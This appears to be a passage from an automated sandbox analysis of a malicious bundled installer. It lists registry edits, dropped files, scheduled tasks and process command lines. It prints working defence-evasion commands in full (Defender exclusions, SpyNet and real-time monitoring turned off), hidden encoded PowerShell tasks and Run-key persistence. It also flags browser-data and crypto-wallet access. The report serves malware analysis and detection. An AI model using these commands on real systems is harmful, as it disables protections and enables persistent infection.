| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\unWhUoTpcLxwC = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NxGlAgQUfzUn = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\unWhUoTpcLxwC = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\FZMYpcBymcbXiuVB = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OdCkbftzuRPDCLooswR = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\InfoInstall = "C:\\Users\\Admin\\AppData\\Roaming\\InfoInstall\\InfoInstall.exe" | C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\is-A7MMA.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Reg Organizer\Languages\is-SVNUU.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-DV6H2.tmp | C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-K3SKE.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-LKVCE.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-P4TTQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-4486U.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\cjNumber | C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-GL0IN.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-6DSK2.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\Documentation\English\is-20DUD.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-UGFNF.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-JIS9A.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-QFE3J.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Reg Organizer\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-860AH.tmp | C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-1DM7Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-45AFE.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Any Drive Formatter\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-HQ93Q.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-3ASBN.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-52SMQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-3DEJA.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-FBLHA.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-UPG7J.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-NG4MM.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-HEEQK.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-194OU.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-AA2TF.tmp | C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-SUQ5L.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-1V9A0.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-FH67E.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-SJL9F.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\ScanRename\is-9EDC2.tmp | C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\ScanRename\ScanRename.exe | C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\ScanRename\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-GLMA5.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-GSAUU.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-7Q57V.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\is-85F56.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\XxxUzwYQU\gZNljN.dll | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-D660G.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files (x86)\Reg Organizer\Documentation\Russian\is-VS512.tmp | C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-51CA6.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe | N/A |
| File created | C:\Program Files (x86)\Any Drive Formatter\is-POECU.tmp | C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\bGAvhKhnIPTNQeobsw.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\YESfVrKgbFKcjSeIN.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\iwOiVBtjWoVYUMW.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\wscript.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings | C:\Windows\SysWOW64\wscript.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Windows\SysWOW64\wscript.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\SysWOW64\wscript.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SoundBose.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe | "C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe" |
| C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp | "C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp" /SL5="$70126,4965743,52224,C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe" |
| C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe | "C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe" |
| C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\system32\schtasks.exe" /Delete /F /TN "Reg Organizer 6" |
| C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe | "C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe" ad9ff40ab2841a8973dbdb0a6dca746b |
| C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe | C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe |
| C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe | C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe /VERYSILENT |
| C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe | C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe /sid=3 /pid=449 |
| C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe | C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b |
| C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe | C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe /S /site_id=757674 |
| C:\Windows\SysWOW64\forfiles.exe | "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&" |
| C:\Windows\SysWOW64\forfiles.exe | "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&" |
| C:\Windows\SysWOW64\cmd.exe | /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& |
| C:\Windows\SysWOW64\cmd.exe | /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& |
| \??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
| \??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 |
| \??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 |
| \??\c:\windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 |
| C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe | C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe |
| C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe | C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe |
| C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp | "C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp" /SL5="$2023E,990754,54272,C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b |
| C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp | "C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp" /SL5="$30242,2567431,54272,C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe" |
| C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "gSRPiGqxS" /SC once /ST 17:12:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" |
| C:\Users\Admin\AppData\Local\Temp\SoundBose.exe | C:\Users\Admin\AppData\Local\Temp\SoundBose.exe |
| C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\system32\schtasks.exe" /Delete /F /TN "Scan Rename" |
| C:\Program Files (x86)\ScanRename\ScanRename.exe | "C:\Program Files (x86)\ScanRename\ScanRename.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b |
| C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe | "C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe" |
| C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "gSRPiGqxS" |
| C:\Windows\system32\taskeng.exe | taskeng.exe {462DC29C-DE10-415F-9641-E7C058AA9F44} S-1-5-21-3385717845-2518323428-350143044-1000:SABDUHNY\Admin:Interactive:[1] |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /c taskkill /im "ScanRename.exe" /f & erase "C:\Program Files (x86)\ScanRename\ScanRename.exe" & exit |
| C:\Windows\SysWOW64\taskkill.exe | taskkill /im "ScanRename.exe" /f |
| C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "gSRPiGqxS" |
| C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "bGAvhKhnIPTNQeobsw" /SC once /ST 18:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe\" bt /site_id 757674 /S" /V1 /F |
| C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe | C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe |
| C:\Windows\system32\cmd.exe | "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe & exit |
| C:\Windows\system32\PING.EXE | ping 0 |
| C:\Windows\system32\taskeng.exe | taskeng.exe {AEE7CBD2-A691-464C-9512-8E447F9C410D} S-1-5-18:NT AUTHORITY\System:Service: |
| C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe | C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe bt /site_id 757674 /S |
| C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "gdoyoZnzk" /SC once /ST 12:07:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" |
| C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "gdoyoZnzk" |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== |
| C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "gdoyoZnzk" |
| C:\Windows\SysWOW64\cmd.exe | cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32 |
| C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32 |
| C:\Windows\SysWOW64\cmd.exe | cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64 |
| C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64 |
| C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "gZmPYbiLE" /SC once /ST 06:42:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" |
| C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "gZmPYbiLE" |
